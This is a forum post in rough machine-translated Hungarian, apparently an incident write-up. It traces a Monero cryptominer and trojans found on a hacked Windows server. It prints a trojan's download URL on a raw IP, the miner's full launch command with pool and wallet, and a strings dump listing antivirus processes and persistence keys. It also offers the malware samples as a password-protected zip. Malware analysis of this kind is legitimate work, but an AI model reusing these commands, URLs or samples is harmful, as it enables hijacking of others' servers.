Tegnap délután hirtelen rájöttem, hogy a weboldalt nem lehet megnyitni, megnéztem az okot, és kiderült, hogy a távoli adatbázis portját nem lehet megnyitni, ezért bejelentkeztem a távoli adatbázis szerverre.
Azt tapasztaltam, hogy a MySQL szolgáltatás leállt, és a CPU 100%-ot foglal el, ahogy az alábbi ábrán is látható:
A CPU foglaltságának rendezése során azt találták, hogy a "win1ogins.exe" a legtöbb erőforrást fogyasztja, a CPU 73%-át foglalja el, személyes tapasztalat szerint ez a bányászati szoftver, ami az XMR Monero bányászatára szolgál!
Felfedeztem a "MyBu.exe" Yiyu folyamatát is, és arra gondoltam, mikor töltötte fel a szerver a Yiyu-ban írt programot? Ahogy az alábbiakban látható:
Jobb kattintással a "MyBu.exe" gombra nyitja meg a fájl helyét, a mappáhely: C:\Windows, majd időbeszámolóban rendezd, és találj 3 új fájlt, ahogy az alábbiakban látható:
1ndy.exe, MyBu.exe, Mzol.exe dokumentumok
Látva ezeket a furcsa fájlokat, úgy éreztem, a szervert fel kellett volna törni, megnéztem a Windows naplókat, és azt találtam, hogy a bejelentkezési naplók törölték, és a szervert tényleg feltörték!
Megpróbáltuk "win1ogins.exe" jobb kattintással a folyamatot és megnyitni a fájl helyét, de azt találtuk, hogy nem lehetett megnyitni!! Nincs reakció! Rendben! Eszközök!!
Az eszköz, amit használok, az "PCHunter64.exe", csak keresd meg és töltsd le magad
A "win1ogins.exe" mappa a következő: C:\Windows\Fonts\system(x64)\, ahogy az alábbi ábrán látható:
Ezt a mappát nem találjuk meg az Explorerben, ahogy az alábbiakban látható:
A következő művelet során 3 vírusos trójai fájlt másolok az újonnan megvásárolt szerveremre az üzemeltetéshez!!
Lemásoltam a vírusfájlt az újonnan megvásárolt szerveremre, majd megpróbáltam megnyitni MyBu.exe fájlt, és azt találtam, hogy MyBu.exe önmagát törölték! És a bányászati szoftver megjelenik, tudjuk, hogy a böngésző nem tudja megnyitni a fájlútvonalat,
Megpróbáltuk használni a PowerShell eszközt, ami az új Windows verzióhoz érkezik, és kiderült, hogy létezik a bányászati szoftver, és három mappa van benne
(Megjegyzendő, hogy normál körülmények között: C:\Windows\Betűtípusok alatt nincs mappá!!)
Telepítettem az FD csomagrögzítő eszközt a szerveremre, megpróbáltuk megnyitni az "1ndy.exe" szoftvert, megtaláltuk, és megpróbáltuk elérni: http://221.229.204.124:9622/9622.exe a legfrissebb vírus trójai letöltése kellene
Most a weboldal elérhetetlen.
Megpróbáltuk megnyitni az "Mzol.exe" szoftvert, de azt találtuk, hogy a program nem tudta, mit akar csinálni. A programot a Notepaddal nyitjuk, ahogy az alábbiakban látható:
LogonServer.exe Játék-sakk és kártyák GameServer.exe Baidu lágy BaiduSdSvc.exe S-U ServUDaemon.exe a robbantásban, DUB.exe a 1433 szkennelésében 1433.exe a Microsoft Antivirus mssecess.exe QUICK HEAL QUHLPSVC.EXE Dr. An V3 S.exe csirkék fogásában V3Svc.exe Dr. Ahn patray.exe koreai kapszula AYAgent.aye Traffic Ore Miner.exe trend TMBMSRV.exe ke niu knsdtray.exe QQ QQ.exe K7 Antivirus K7TSecurity.exe QQ Computer Butler QQPCRTP.exe Kingsoft Guardian ksafe.exe Norton Antivirus rtvscan.exe Avast Network Security ashDisp.exe Avira avcenter.exe Kingsoft kxetray.exe NOD32 egui.exe McCafe Mcshield.exe Rising Antivirus RavMonD.exe Jiangmin Antivirus KvMonXP.exe Kaspersky avp.exe 360 Antivirus 360sd.exe 360 Security Guard 360tray.exe : %s:%d:%s F r i e n d l y N a m e SysFreeString Oleaut32.dll CoCreateInstance CoUninitialize CoInitialize Ole32.dll %d*%sMHz HARDWARE\DEscrip{filtering}tION\System\CentralProcessor\0 ~MHz c:\%s kernel32.dll IsWow64Process No Info Elkezdtem bejelentkezni a SOFTWARE\Microsoft\Windows\CurrentVersion\Run C:\Windows\1ndy.exe Descrip{filter}tion SYSTEM\CurrentControlSet\Services\%s RtlGetNtVersionNumbers ntdll.dll EGYÉB kapcsolatok FOGLALT kapcsolatok PROXY kapcsolatok LAN kapcsolatok MODEM kapcsolatok NULL CTXOPConntion_Class 3389 Portszám SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s Nem fedezték fel Alapértelmezett RDP-TCP Szerző: Shi Yonggang, email:pizzq@sina.com
Személy szerint azt hiszem, hogy a "Mzol.exe" és a "1ndy.exe" valójában ugyanaz, csak a különbség az új és a régi verzió között!
Nézzük meg win1ogins.exe a szoftver indítási paramétereit, ahogy az alábbiakban látható:
C:\Windows\Fonts\system(x64)\win1ogins.exe -a cryptonight -o stratum+tcp://pool.supportxmr.com:5555 -u 49YwvcQRrVvYXR2H9Ww5u1FaB3AhGVCuo8iWnc99BVPv5Su2epJ3mYfN3voS6h3Kurd8V5rGPSooyd7LdWYLXXwjSjdZb9y -p MyBlue -o stratum+tcp://pool.minexmr.com:443 -u 49YwvcQRrVvYXR2H9Ww5u1FaB3AhGVCuo8iWnc99BVPv5Su2epJ3mYfN3voS6h3Kurd8V5rGPSooyd7LdWYLXXwjSjdZb9y -p x -k --donate-level=1
Ha valóban bányászatunk XMR Monero-t, megnyitjuk a bányászati pool címet: https://supportxmr.com/ Kérdezzük a pénztárca címét, ahogy az alábbi ábrán látható:
A bevételt a számítási kapacitás alapján számítjuk, naponta 0,42 érmét ásunk ki, és a jelenlegi piac szerint több mint 1 000-et számolunk, a napi jövedelem valószínűleg több mint 500 jüan!
Természetesen a Monero is több mint 2 000 jüanra emelkedett!
Ami a "win1ogins.exe" bányászati vírus eltávolítását illeti, a PCHunter64 program manuálisan is képes eltávolítani a bányászati vírust! A folyamat befejezése egyszerűen nem működik, manuálisan tisztítottam a vírust a szerveremen.
Természetesen jobb másokra bízni a vírus eltávolítását, hiszen én nem vagyok szakember ebben!
Végül csatolj hozzá 3 vírusfájlt, és bontsd ki a jelszót A123456
1ndy.zip
(1.29 MB, Letöltések száma: 12, 售价: 1 粒MB)
(Vége)
|
Közzétéve 2018. 04. 04. 12:37:15
|
|
|
|
